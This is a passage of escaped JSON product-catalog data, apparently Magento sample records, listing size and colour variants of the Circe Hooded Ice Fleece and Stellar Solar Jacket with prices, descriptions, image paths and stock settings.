max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1162\":{\"sku\":\"WH12-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece-XL-Purple\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"circe-hooded-ice-fleece-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},\"1163\":{\"sku\":\"WH12\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Circe Hooded Ice Fleece\",\"description\":\"<p>Keep shivers at bay with the Circe Hooded Ice Fleece. Ultra-thick, high-pile fleece traps your body heat and keeps cold outside. The drawstring hood and ribbed details add extra coziness and touches of classic style. Its relaxed fit is loose enough to layer comfortably over your shirt.<\\/p>\\n<p>Full-zip front. <br \\/>Three-panel hood. <br \\/>Flatlock seams throughout. <br \\/>Welt hand pockets. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"68\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Hoodie|Sweatshirt|Full zip,material=Fleece|CoolTech&trade;,pattern=Solid,climate=Cold|Cool|Wintry,eco_collection=Yes,performance_fabric=Yes,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WH12-XS-Gray,size=XS,color=Gray|sku=WH12-XS-Green,size=XS,color=Green|sku=WH12-XS-Purple,size=XS,color=Purple|sku=WH12-S-Gray,size=S,color=Gray|sku=WH12-S-Green,size=S,color=Green|sku=WH12-S-Purple,size=S,color=Purple|sku=WH12-M-Gray,size=M,color=Gray|sku=WH12-M-Green,size=M,color=Green|sku=WH12-M-Purple,size=M,color=Purple|sku=WH12-L-Gray,size=L,color=Gray|sku=WH12-L-Green,size=L,color=Green|sku=WH12-L-Purple,size=L,color=Purple|sku=WH12-XL-Gray,size=XL,color=Gray|sku=WH12-XL-Green,size=XL,color=Green|sku=WH12-XL-Purple,size=XL,color=Purple\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"image\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh12-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh12-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Hoodie|Sweatshirt|Full zip\",\"material\":\"Fleece|CoolTech&trade;\",\"pattern\":\"Solid\",\"climate\":\"Cold|Cool|Wintry\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1164\":{\"sku\":\"WJ01-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Stellar Solar Jacket-S-Blue\",\"description\":\"<p>Beat the heat and protect yourself from sunrays with the Stellar Solar Jacket. It\'s loaded with all the engineered features you need for an intense, safe outdoor workout: 100% UV protection, a breathable perforated construction, and advanced moisture-wicking technology.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Reflectivity. <br \\/>&bull; Flat seams. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Deep pink jacket with front panel rouching<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stellar-solar-jacket-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"1165\":{\"sku\":\"WJ01-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Stellar Solar Jacket-S-Red\",\"description\":\"<p>Beat the heat and protect yourself from sunrays with the Stellar Solar Jacket. It\'s loaded with all the engineered features you need for an intense, safe outdoor workout: 100% UV protection, a breathable perforated construction, and advanced moisture-wicking technology.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Reflectivity. <br \\/>&bull; Flat seams. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Deep pink jacket with front panel rouching<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stellar-solar-jacket-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj01-red_alt1.jpg,\\/w\\/j\\/wj01-red_back.jpg\",\"image\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj01-red_alt1.jpg,\\/w\\/j\\/wj01-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1166\":{\"sku\":\"WJ01-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Stellar Solar Jacket-S-Yellow\",\"description\":\"<p>Beat the heat and protect yourself from sunrays with the Stellar Solar Jacket. It\'s loaded with all the engineered features you need for an intense, safe outdoor workout: 100% UV protection, a breathable perforated construction, and advanced moisture-wicking technology.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Reflectivity. <br \\/>&bull; Flat seams. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Deep pink jacket with front panel rouching<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stellar-solar-jacket-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1167\":{\"sku\":\"WJ01-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Stellar Solar Jacket-M-Blue\",\"description\":\"<p>Beat the heat and protect yourself from sunrays with the Stellar Solar Jacket. It\'s loaded with all the engineered features you need for an intense, safe outdoor workout: 100% UV protection, a breathable perforated construction, and advanced moisture-wicking technology.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Reflectivity. <br \\/>&bull; Flat seams. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Deep pink jacket with front panel rouching<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stellar-solar-jacket-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1168\":{\"sku\":\"WJ01-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Stellar Solar Jacket-M-Red\",\"description\":\"<p>Beat the heat and protect yourself from sunrays with the Stellar Solar Jacket. It\'s loaded with all the engineered features you need for an intense, safe outdoor workout: 100% UV protection, a breathable perforated construction, and advanced moisture-wicking technology.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Reflectivity. <br \\/>&bull; Flat seams. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Deep pink jacket with front panel rouching<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stellar-solar-jacket-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj01-red_alt1.jpg,\\/w\\/j\\/wj01-red_back.jpg\",\"image\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj01-red_alt1.jpg,\\/w\\/j\\/wj01-red_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1169\":{\"sku\":\"WJ01-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Stellar Solar Jacket-M-Yellow\",\"description\":\"<p>Beat the heat and protect yourself from sunrays with the Stellar Solar Jacket. It\'s loaded with all the engineered features you need for an intense, safe outdoor workout: 100% UV protection, a breathable perforated construction, and advanced moisture-wicking technology.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Reflectivity. <br \\/>&bull; Flat seams. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Deep pink jacket with front panel rouching<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"75\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"stellar-solar-jacket-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1170\":{\"sku\":\"WJ01-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Stellar Solar Jacket-L-Blue\",\"description\":\"<p>Beat the heat and protect yourself from sunrays with the Stellar Solar Jacket. It\'s loaded with all the engineered features you need for an intense, safe outdoor workout: 100% UV protection, a breathable perforated construction, and advanced moisture-wicking technology.<\\/p>\\n<p>&bull; Loose fit. <br \\/>&bull; Reflectivity. <br \\/>&bull; Flat seams. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Deep pink jacket with front panel 